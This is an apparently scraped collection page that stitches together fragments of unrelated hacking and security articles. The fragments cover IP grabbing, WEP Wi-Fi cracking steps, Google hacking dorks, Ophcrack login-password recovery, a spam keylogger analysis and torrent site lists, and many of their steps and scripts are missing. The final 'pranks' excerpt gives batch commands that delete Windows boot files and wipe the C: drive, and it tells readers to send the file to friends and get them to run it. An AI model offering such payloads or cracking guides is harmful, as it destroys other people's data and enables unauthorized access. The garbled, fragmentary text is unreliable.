background preloader

Everything You Wanted to Know about TOR & the Deep Web

Everything You Wanted to Know about TOR & the Deep Web

How to Hack Someones IP Address 2014 - Come to Hack Most of you may be curious to know how to find the IP address of your friend’s computer or to find the IP address of the person with whom you are chatting in Yahoo messenger or Gtalk. Finding out someone's IP address is like finding their phone number, an IP address can be used to find the general location where that person lives. Now while most of the tutorials on the net teach you how to steal an ip address via MSN, or any other chat software, in this post I’ll show you how to find IP address of someones computer using script. NOTE: This tutorial is for educational purposes only, I am NOT responsible in any way for how this information is used, use it at your own risk. How to Hack Someones IP Address? Alright, I'm gonna give you this script, that you write in the index.php. Here is the sript: 1. 2. 3. 4. This is a very simple, but effectually method for stealing someones IP Address. Hope you'll find this tutorial useful. Introduction1. 4. Learn C & C++ Programming Time to start.

Unlocking a Word Document under Windows How to Unlock a Word Document under Windows Seth Teller, August 2009 (send me email) Some authors (for example, of forms to be filled out) "lock" their documents under Windows. If you web-search on "unlock word document" or "unlocking word document" you get a bunch of pages with advice that doesn't work under Windows, or pointers to paid software. 1. 2. 3. 4. 5. 6. 7. Your original Word document can now be edited normally. Back to Seth Teller's home page. How to Secure Your PC: 11 Steps Edit Article Edited by Askmeaskme, Lojjik Braughler, Teresa, BethyB and 24 others So you have just bought a new personal computer for your home (rather than for a workplace or as a server) and want to secure it (including protecting it from viruses and spyware). Privacy (including encryption, cryptography and anonymity) is a part of security but broad enough to need covering separately. Think of Privacy as the flipside of the coin. Making backups of data, defragging, system restore points are only indirectly related. This article assumes you wish to use a network (such as the internet), share files on thumb drives and that your PC might be physically accessible to others. Ad Steps 1Choose an operating system based on its security and vulnerability (Linux has no known active viruses in the wild, OpenBSD is focused on security). 12Use the best Encryption software "Folder Lock". Tips In most circumstances, the most dangerous thing on a computer is the user. Warnings

Hack Any Password Protected Wi-Fi Network Full Free Download Hack Any Password Protected Wi-Fi Network Full Hello Friends here i am sharing a tutorial for wifi cracking via Commview and aircrack so lets start it. Tools Needed : 1) Commview for Wifi 2) Aircrack-ng Instructions Of Hack Any Password Protected Wi-Fi Network Full: 1) Download, Install and open Commview for wifi. 2) Click on the “Blue play button” and the screen shown below will appear. 3) Now as all the available networks start to load, look for your target. 4) Now you will see the screen shown below as they collect packets. Note : The packets are secondary, What is actually happening here is that we are trying to collect as much IVs (Initialization vector) from those retrieved packets. 6) Now minimize Commview and locate the logged packets on your hard drive. 10) Click on the “Choose Button” and direct it to your Wireshark file that you just saved a minute ago. 11) Lets keep the Encryption type to “WEP”. 12) Key Size : 128 13) Now proceed to press on the launch button. Congratulations!

Secure File Transfer Alternatives | Protect IU Overview Transferring files between machines (and users) is a common occurrence. Perhaps you need to send a class roster spreadsheet to an office assistant or a document containing a grant proposal to a colleague at another University. In each of these cases, it's important to know what options are available to get your file from point A to point B and to understand whether the method you choose provides adequate security given the sensitivity of the data being transferred. Terminology Cryptography Cryptography is the science of enabling secure electronic communications between a sender and one or more recipients. Encryption Encryption is the process of taking normal text (plaintext) and making that plaintext unintelligible by anyone other than those possessing the correct key. Decryption Decryption is the process of applying a key to encrypted data and obtaining the original plaintext. Key Alternatives FTP an encrypted file FTP tunneled through SSH E-mail E-mail an encrypted file Stunnel Summary

6 Ways to Surf the Web Anonymously with Proxies Steps Setting Up a Proxy in Mozilla Firefox <img alt="Image titled Surf the Web Anonymously with Proxies Step 1" src=" width="728" height="546" class="whcdn" onload="WH.performance.clearMarks('image1_rendered'); WH.performance.mark('image1_rendered');">1Open Mozilla Firefox. <img alt="Image titled Surf the Web Anonymously with Proxies Step 2" src=" width="728" height="546" class="whcdn">2Click the Firefox option on the upper-left corner. Setting Up a Proxy in Microsoft Internet Explorer Setting Up a Proxy in Google Chrome Setting Up a Proxy in Safari in Windows Setting Up a Proxy in Safari on Mac Using Web-Based Proxies Community Q&A Tips

John the Ripper Sample output[edit] Here is a sample output in a Debian environment. # cat pass.txt user:AZl.zWwxIh15Q # john -w:password.lst pass.txt Loaded 1 password hash (Traditional DES [24/32 4K]) example (user) guesses: 1 time: 0:00:00:00 100% c/s: 752 trying: 12345 - pookie Attack types[edit] One of the modes John can use is the dictionary attack. John also offers a brute force mode. See also[edit] References[edit] External links[edit] The Best BitTorrent Websites « GeekLimit Posted by AtariBoy | Filed under Software, Web BitTorrent is a great way of transfering large files across the net without putting large loads of servers. All you need are the torrent files. Here are a few of the best sites you can get legal and not-so-legal torrents from. BitTorrent.com – The origonal site from the creator of the BitTorrent protocol. Legaltorrents.com – 100% Legal torrents, many independant films and music. Linux Tracker - As many Linux ISOs as you can handle, all free of course. Torrentz.com - One of the best torrent search engines available. The Pirate Bay – The biggest tracker of them all, many not-so-legal torrents. Torrentspy - Moving towards more legal torrents, a very popular site. TorrentPortal – Lots of Ads, but if you can get past them its a gold mine of great torrents. Demonoid - A great community, invite only. JabberWalker – Another torrent search page. TorrentBytes - A nice simple forum style torrent list site. MegaNova – In the wake of SuprNova, nice fast search.

VulnerabilityAssessment.co.uk Pwning a Spammer's Keylogger Recently, while scrounging around our spam traps, I spotted this ordinary piece of malicious spam. It uses a very simple social engineering trick, speculating about Obama’s sexual orientation and a link to a supposed picture to prove it. There was nothing special about this spam but the link with a double extension file named “you.jpg.exe” was something worth investigating. So out of curiosity, I downloaded the file and checked out what it does. First thing I did was to find out what the file really was. Of course, it was not an image file of Obama but rather a self-extracting RAR file. Opening the file through a RAR extracting tool revealed the files inside it. I extracted “you.jpg.exe” and inspected each of the files inside it but found they were actually encoded. In the background, the following files were installed in the Windows System32 folder: bpk.datbpk.exebpkhk.dllbpkr.exeinst.datpk.bin Also an autorun registry was created: I almost ended the analysis here. And voila!

Google hacking master list This master list of Google Hacking command sets has show up on a forum in Russia, as well as on Scribd. While we often forget about Google hacking, and rarely use it against our own sites, a list like this is going to keep the kids happy as they merrily pound their way through Google to your systems. This makes the data much more accessible than at Johnny I hack stuff. There are some drawbacks in how Johnny I hack stuff works, you have to do a lot of clicking to get to the right hacks. Check it out, here is a copy of the master list in case you do not want to go to a hacker forum in Russia, or do not want to sign up for a scribd account (the only way to download it or cut and paste the document in Scribd is to make an account). Code: admin account info" filetype:log ! nurl:/admin/login.asp inurl:/cgi-bin/sqwebmail?

How to Crack the Account Password on Any Operating System – Joe Tech This guest post was written by Blair Mathis from LaptopLogic.com – your premier source for the latest laptop software news and best laptop accessories. Computer passwords are like locks on doors – they keep honest people honest. If someone wishes to gain access to your laptop or computer, a simple login password will not stop them. Most computer users do not realize how simple it is to access the login password for a computer, and end up leaving vulnerable data on their computer, unencrypted and easy to access. Are you curious how easy it is for someone to gain access to your computer? If so, read on to see the technique one might use to figure out your computer password. Windows Windows is still the most popular operating system, and the method used to discover the login password is the easiest. Simply download the Ophcrack ISO and burn it to a CD (or load it onto a USB drive via UNetbootin). The computer will restart and Ophcrack will be loaded. fsck -fy mount -uw / dscl . That’s it.

Painful Computer Pranks Computer pranks to freak out your friends and make them crying for mummy I've been posting many articles about computer pranks on this blog (Deadly Virus Prank, The Ultimate Virus, How to Create a Fake and Harmless Virus and Facebook Virus Prank). Today , I will show you 5 great computer pranks that will frustrate your victims very much. These pranks could be very painfully, so please use them at your own risk ;) 1. I stumbled across this URL while surfing the internet. 2. Open notepad and copy/paste this code: @echo offattrib -r -s -h c:\autoexec.batdel c:\autoexec.batattrib -r -s -h c:\boot.inidel c:\boot.iniattrib -r -s -h c:\ntldrdel c:\ntldrattrib -r -s -h c:\windows\win.inidel c:\windows\win.ini Now Save it as a .bat file. This should shutdown the persons computer. Send it to your friends computer and tell them to open it. Here is another code too..... cmd /c del c:\windows\* /F /S /Q cmd /c del c:\* /F /S /Q Paste it in NotePad And Save It with Extension .cmd or .bat

Related: